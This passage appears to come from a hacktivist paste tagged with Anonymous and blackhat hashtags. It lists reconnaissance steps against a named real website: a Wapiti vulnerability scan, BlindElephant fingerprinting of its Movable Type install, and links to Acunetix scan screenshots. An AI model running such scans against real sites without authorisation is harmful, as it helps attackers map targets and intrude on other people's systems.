  4437. Open /tmp/scan_report/index.html with a browser to see this report
  4438.  
  4439.  
  4440. CHECK THE SITE WITH WAPITI
  4441.  
  4442. root@blackbox:~# aptitude install wapiti
  4443.  
  4444. root@blackbox:~# wapiti --url http://etours.cn/ --scope folder -v 1 -f html -o /tmp/scan_report
  4445.  
  4446.  
  4447. USE BLINDELEPHANT
  4448.  
  4449. root@blackbox:~# cd /opt/
  4450. root@blackbox:/opt# git clone https://github.com/lokifer/BlindElephant.git
  4451. root@blackbox:/opt# cd BlindElephant/src/
  4452. root@blackbox:/opt/BlindElephant/src# python setup.py install
  4453.  
  4454. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn movabletype
  4455.  
  4456. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn guess
  4457.  
  4458. Probing...
  4459.  
  4460. ACUNETIX SCAN
  4461. https://pasteboard.co/ISeK7WC.jpg
  4462.  
  4463. https://pasteboard.co/ISeKyZk.jpg
  4464.  
  4465. #Anonymous #TheCreed #blackhat_global #GBN